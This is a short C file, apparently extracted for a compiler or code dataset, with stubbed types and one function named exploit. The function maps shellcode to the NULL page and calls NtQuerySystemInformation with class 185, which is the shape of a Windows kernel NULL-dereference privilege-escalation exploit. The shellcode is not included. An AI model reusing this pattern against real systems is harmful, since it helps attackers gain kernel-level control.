
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int SYSTEM_INFORMATION_CLASS ;
typedef int DWORD ;
typedef int Buffer ;
typedef int BYTE ;


 int NtQuerySystemInformation (int ,int *,int,int *) ;
 int RtlCopyMemory (int *,int ,int) ;
 int RtlZeroMemory (int *,int) ;
 int shellcode ;

void exploit(void) {
 BYTE Buffer[8];
 DWORD BytesReturned;

 RtlZeroMemory(Buffer, sizeof(Buffer));
 NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)185, Buffer, sizeof(Buffer), &BytesReturned);


 RtlCopyMemory(((void*)0), shellcode, 256);

 RtlZeroMemory(Buffer, sizeof(Buffer));
 NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)185, Buffer, sizeof(Buffer), &BytesReturned);
}
